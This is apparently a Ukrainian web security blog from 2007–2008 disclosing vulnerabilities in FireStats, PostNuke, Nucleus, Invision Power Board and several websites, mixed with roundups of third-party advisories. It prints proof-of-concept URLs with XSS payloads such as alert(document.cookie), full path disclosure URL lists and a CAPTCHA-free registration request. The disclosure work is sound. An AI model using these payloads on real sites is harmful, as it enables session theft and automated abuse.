Websecurity - Веб безпека

Сьогодні я знайшов численнні уразливості в FireStats плагіні для WordPress (та інших CMS). Про що найближчим часом повідомлю розробникам плагіна. Зараз я оприлюдню першу частину уразливостей в FireStats - Full path disclosure та Cross-Site Scripting.

Full path disclosure:

http://site/wp-content/plugins/firestats/js/firestats.js.php
http://site/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1
http://site/wp-content/plugins/firestats/php/footer.php
http://site/wp-content/plugins/firestats/php/page-help.php
http://site/wp-content/plugins/firestats/php/page-import.php
http://site/wp-content/plugins/firestats/php/page-settings.php
http://site/wp-content/plugins/firestats/php/page-stats.php
http://site/wp-content/plugins/firestats/php/tabbed-pane.php
http://site/wp-content/plugins/firestats/php/ezsql/mysql/demo.php
http://site/wp-content/plugins/firestats/php/ezsql/mysql/disk_cache_example.php
http://site/wp-content/plugins/firestats/php/ip2c/benchmark.php
http://site/wp-content/plugins/firestats/php/ip2c/ip2c_test.php
http://site/wp-content/plugins/firestats/php/unzip/sample.php

XSS:

Persistent XSS уразливість в полі UserAgent. При відвідуванні сайта зі спеціально створеним заголовком UserAgent, дане значення UA відображується на сторінці статистики без попередньої фільтрації.

Уразливі FireStats 1.0.2 та попередні версії.

04.03.2008

У серпні, 01.08.2007, я знайшов Cross-Site Scripting уразливість на проекті http://multilex.online.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів online.ua я писав про уразливості на market.online.ua та market-ru.online.ua.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.07.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.

Нещодавно, 19.07.2008, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі PostNuke Phoenix. Дірки я виявив на декількох сайтах, що використовують даний движок. Про що найближчим часом повідомлю розробникам системи.

Insufficient Anti-automation:

Уразливість в user.php (в модулі NS-NewUser).

http://site/user.php?uname=test&pass=12345&vpass=12345&email=test@test.com&vemail=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уразливість в user.php (в модулі NS-NewUser) в параметрі op.

http://site/user.php?module=NS-NewUser&op=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дірки перевірив на версіях 0.7.2.3 і 0.7.2.6. Тому уразливі PostNuke Phoenix 0.7.2.6 та попередні версії (та потенційно наступні версії).

В даній добірці уразливості в веб додатках:

• SUN Java JNLP Overflow (деталі)
• Sun Java WebStart JNLP Stack Buffer Overflow Vulnerability (деталі)
• CVE-2007-3693: Cross site scripting and information disclosure in gobi/helma (деталі)
• eSoft InstaGate EX2 Cross-Site Request Forgery Attack (деталі)
• Dotclear remote script execution (деталі)
• Powered By Dvbbs Version 7.1.0 Sp1 By Pass (деталі)
• paFileDB 3.6 (search.php) Remote SQL Injection (деталі)
• Element CMS script insertion vulnerability (деталі)
• Session Riding and multiple XSS in WebCit (деталі)
• PHP-інклюдинг в DreamStats (деталі)

17.06.2008

У жовтні, 27.10.2007, я знайшов Full path disclosure, SQL DB Structure Extraction, SQL Injection, Cross-Site Scripting та Insufficient Anti-automation уразливості в системі Nucleus. Раніше я вже згадував про деякі з цих уразливостей в даному движку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.07.2008

Full path disclosure:

http://site/action.php?action=addcomment

SQL DB Structure Extraction:

http://site/action.php?action=addcomment

SQL Injection:

Уразливості в http://site/action.php в параметрах itemid, myid.

Nucleus SQL Injection.html

XSS:

POST запит на сторінці http://site/action.php
"><script>alert(document.cookie)</script>В параметрах: itemid, myid, remember.

Insufficient Anti-automation:

Nucleus CAPTCHA bypass.html

Nucleus CAPTCHA bypass2.html

Про дані уразливості я писав торік в записах MoBiC-20: Nucleus CAPTCHA bypass та MoBiC-20 Bonus: another Nucleus CAPTCHA bypass.

Уразливі Nucleus 3.01 та попередні версії.

На початку минулого року була оприлюднена Cross-Site Scripting уразливість в Invision Power Board. Уразливий скрипт admin.php. Враховуючи, що дірка в адмінці IPB, то атакувати потрібно залогіненого адміна, а враховуючи роздільну авторизацію на форумі і в адмінці в IPB, то необіхно атакувати саме в той час, коли адмін є залогіненим в адмінку.

На securitylab.ru та на інших сайтах помилково повідомляється, що уразливим є параметр phpinfo в скрипті admin.php. Насправді такого параметра в адмінці IPB немає , і уразливість знаходиться в розділі “Данные сервера” (у параметра code значення phpinfo), і при цьому задається новий масив з XSS кодом.

XSS:

http://site/admin.php?adsess=...&act=op&code=phpinfo&a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

При цьому потрібно знати значення поточної сесії адміна (параметр adsess), щоб провести атаку (що ускладнює атаку). Це можна зробити через витік інформації або за допомогою іншої XSS.

Уразливі версії Invision Power Board 1.0.x, 1.1.x, 2.0.x і 2.1.x (та потенційно наступні версії).

• Cross-site scripting vulnerability in Invision Power Board (деталі)

В даній добірці уразливості в веб додатках:

• Apple Safari for Windows feed:// URL Denial of Service Vulnerability (деталі)
• Safari for Windows, 0day URL protocol handler command injection (деталі)
• Cross Site Scripting in Oliver Library Management System (деталі)
• MySQLDumper vulnerability: Bypassing Apache based access control possible (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in in Webmin and Usermin (деталі)
• SQL-ін’єкція в enVivo!CMS (деталі)
• AsteriDex (Asterisk / Trixbox) remote code execution (деталі)
• phpTrafficA <=1.4.3 Admin Login Bypass (деталі)
• HomestayFinder XSS Vulnerability in Wikipedia Mirror (деталі)
• Обхід обмежень безпеки в Drupal Captcha Module (деталі)

Сьогодні я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі PostNuke. Дірки я виявив на сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Insufficient Anti-automation:

Уразливість в user.php (в модулі NS-NewUser).

http://site/user.php?uname=test&email=test@test.com&vemail=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уразливості в user.php (в модулі NS-NewUser) в параметрах uname та email.

http://site/user.php?uname=%22%20style=%22xss:expression(alert(document.cookie))&module=NS-NewUser&op=confirmnewuser

http://site/user.php?email=%3Cscript%3Ealert(document.cookie)%3C/script%3E&vemail=&module=NS-NewUser&op=confirmnewuser

Уразлива версія PostNuke 0.7.1 та попередні версії (та потенційно наступні версії).

29.02.2008

У липні, 31.07.2007, я знайшов Cross-Site Scripting уразливість на сайті http://www.wikia.com, а 01.02.2008 - Cross-Site Scripting уразливість вже в самій Wikia Search (яка співпрацює з проектом grub.org). Про що найближчим часом сповіщу адміністрацію пошукової системи.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.07.2008

XSS:

http://www.wikia.com

• alert(document.cookie)

http://re.search.wikia.com

• alert(document.cookie) (IE)

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• KF Web Server 3.1.0 admin console XSS (деталі)
• SQL Injection In Script VBZooM V1.12 (деталі)
• WheatBlog 1.1 RFI/SQL Injection (деталі)
• AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights (деталі)
• AV Arcade 2.1b (view_page.php) Remote SQL Injection (деталі)
• PHPDirector <= 0.21 (SQL injection/Upload SHELL) Remote Vulnerabilities (деталі)
• eTicket v.1.5.1.1 Multiple Cross-Site Scripting (деталі)
• Gentili, akocomment SQL INJECTION (all version) (деталі)
• Yoggie Pico Pro Remote Code Execution (деталі)
• Міжсайтовий скриптінг в Drupal Project Module (деталі)